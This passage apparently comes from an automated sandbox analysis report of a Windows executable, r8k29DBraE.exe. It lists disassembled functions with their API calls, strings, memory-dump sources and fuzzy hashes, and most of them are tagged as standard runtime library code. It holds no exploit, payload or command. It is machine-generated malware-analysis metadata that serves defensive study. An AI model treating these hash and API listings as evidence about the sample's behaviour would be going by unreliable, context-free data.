                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 3743429067-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction ID: 10f5da8e496c9e34297fbddd7d2f6e010fd57b3cb8bb1b18d0e9abf332d64a12
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9418337214BC4DAE764CF21E44839E77AAF389B98F088115DB8907758DF39D89ACB00
                                                                                                                                                                                                                                                Function 000002616F59D5D8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,000002616F59CD4E,?,?,?,?,?,?,?,?,000002616F59D50D,?,?,00000001), ref: 000002616F59D5F7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F59CD4E,?,?,?,?,?,?,?,?,000002616F59D50D,?,?,00000001), ref: 000002616F59D616
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F59CD4E,?,?,?,?,?,?,?,?,000002616F59D50D,?,?,00000001), ref: 000002616F59D63E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F59CD4E,?,?,?,?,?,?,?,?,000002616F59D50D,?,?,00000001), ref: 000002616F59D64F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F59CD4E,?,?,?,?,?,?,?,?,000002616F59D50D,?,?,00000001), ref: 000002616F59D660
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID: 1%$Y%
                                                                                                                                                                                                                                                • API String ID: 3702945584-1395475152
                                                                                                                                                                                                                                                • Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction ID: da05403bb0eded14bd997136148c552751d1bcafc17a47e44d3677a3fa356f24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF116338B042C489FA5C5722D569369628F5B467F0F1CC32468BD477D6DE2AFC228600
                                                                                                                                                                                                                                                Function 000002616F306920 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: dd822430ca009dc190df4ddc95dc0ea58042227217f260eb7b887e03614529c6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A881F57C7002418EFA54EB26D44935926EFAB86780F4C9027AE05477DADB3BE8B5C703
                                                                                                                                                                                                                                                Function 000002616F597520 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: 55fc23e27224eca235e220da2ea6cc2f4d9cc9c943196519d2a81a15fa018df3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A481C1386007818EFB58AB29F4593A9269FA787780F5CD0179D0943796EB3BED768700
                                                                                                                                                                                                                                                Function 000002616F59A148 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction ID: c8fa7335d137f5f1714da9d2530d566be02a29c8eb32a3932cbdbf1a8eee4ccb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06314639702780D9EE5A8B42E408355279EF746BA0F5D8525DD1D0B380EF3BEC798310
                                                                                                                                                                                                                                                Function 000002616F5A4324 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction ID: ae1bb5767752e099d0f8283794a70c71f385c6a7e6803670e773abda6f4ed80e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2311B235310B408AE3508B56F85831976A9F388FE4F088215EE6A877A4CF39DC788740
                                                                                                                                                                                                                                                Function 000002616F5914A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Free
                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\r8k29DBraE.exe
                                                                                                                                                                                                                                                • API String ID: 3168794593-2002025803
                                                                                                                                                                                                                                                • Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction ID: 11ad6b47202d658abe99bc31435cf4e6b4f094c7c94a340b44e28909c7e876ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 013161BF509BC08EE3578B69D8592492FAAF39AF40F0DC015DE4443247DA26A83A8740
                                                                                                                                                                                                                                                Function 000002616F59D510 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction ID: 1cc8d5048ed1c234fa69c016be5dd5a49c99511bdc386ebf0a068b7f16618e1f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B116D3C2042C48AFA5CA725D66D32D629F6B467F4F1CC724AC76477DADE2AEC218740
                                                                                                                                                                                                                                                Function 000002616F5919A4 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 517849248-0
                                                                                                                                                                                                                                                • Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction ID: d93d11b5148e1052a343399212262d7f5824a205b14de5f7412693c1af655a03
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB016D35300B808AEB14DB16E45C35967AAF789BC0F488435DE5A43754DF3DDDAA8740
                                                                                                                                                                                                                                                Function 000002616F5936DC Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 449555515-0
                                                                                                                                                                                                                                                • Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction ID: 317b7c029a5a94bc7ae351203d52ddc5272afa3e10eca254d47e894f2d1c0c54
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B01807C6117448EFB259B25E81C31A37AABB4AB86F088024CD4D07764EF3ED979CB10
                                                                                                                                                                                                                                                Function 000002616F591A48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: 61e2dc35a84047443eef843ddae7c60c380ff5f15506449f440bc123b5ade45a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21F0C236300B809AEB208B64F5D8759676AF759B88F88C021DE4943954DF7EDEBDCB00
                                                                                                                                                                                                                                                Function 000002616F59C208 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction ID: 0925981fd644e2039727158cb129a2ea9561925e4b4067967d00bf06e7a3cf89
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32F09679311B0585EF148B68F44C3595326FB86BA1F5C8219CDAA462E8CF3EE87CC310
                                                                                                                                                                                                                                                Function 000002616F593058 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CombinePath
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3422762182-91387939
                                                                                                                                                                                                                                                • Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction ID: 12d132362a35b3e3be6436785832f3ccd5d51974c088da4f0cae0c1182744019
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07F08238314B8085EA048B1BF91C119666AAB49FD0F0CC031EE5A47B18DF3DD8BA8700
                                                                                                                                                                                                                                                Function 000002616F595720 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: 233253c0af1c71537342ffad3d4117e803acd28c2e037e013065ef1ae825a821
                                                                                                                                                                                                                                                • Instruction ID: dd56751c3377d49462de0dfae5a81bfca469e7809adf0074a7c0a29b584a162a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 233253c0af1c71537342ffad3d4117e803acd28c2e037e013065ef1ae825a821
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A761713A119B84CAE764CB19F45831AB7E9F389784F189115FA8D43BA8DB3DD964CF00
                                                                                                                                                                                                                                                Function 000002616F313A74 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 8b53d4e254c11de1a8615dbf3dfa432433468a61b6f385beffc11875e7a12db1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9611063EA10A000DF665D168E84F369306F6F6A376F0C0330A976072EADA66A871C102
                                                                                                                                                                                                                                                Function 000002616F5A4674 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 2501108d79f3888e06cc71753b8c3f2d6112a41ecd5402b9c3db00c8cfa5aecd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3911823EA10B514AF65411E8E44E369115F7B593B8F1CD634ADB7076F6CE3AAC7D8200
                                                                                                                                                                                                                                                Function 000002616F598580 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: a73d6da13a4f776946359a1131cded815efbbf00880d5c852d1789b80240eaac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4751E33A3196808EDB58CF15E448B2C339BF356B99F98C121DA5647788DB3BEC61C701
                                                                                                                                                                                                                                                Function 000002616F59AFC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: d3ffc81e7c9eb2d0887fe4fad70bfba91deec3aacd10c34b4f5a7622146221e6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D061F636504BC49AEB349F15E48439EB7A5F786788F088215EB9903B59CB3DD5A4CB00
                                                                                                                                                                                                                                                Function 000002616F30A770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: a47512c3927ec5e9f2943836f4348a17992453ff50a442f8eb514fcf2c3677e8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92516D3A204284CEEF64CF15E44875977AAF354B94F1C8217DA9987BD5CB3AE8B1C702
                                                                                                                                                                                                                                                Function 000002616F59B370 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
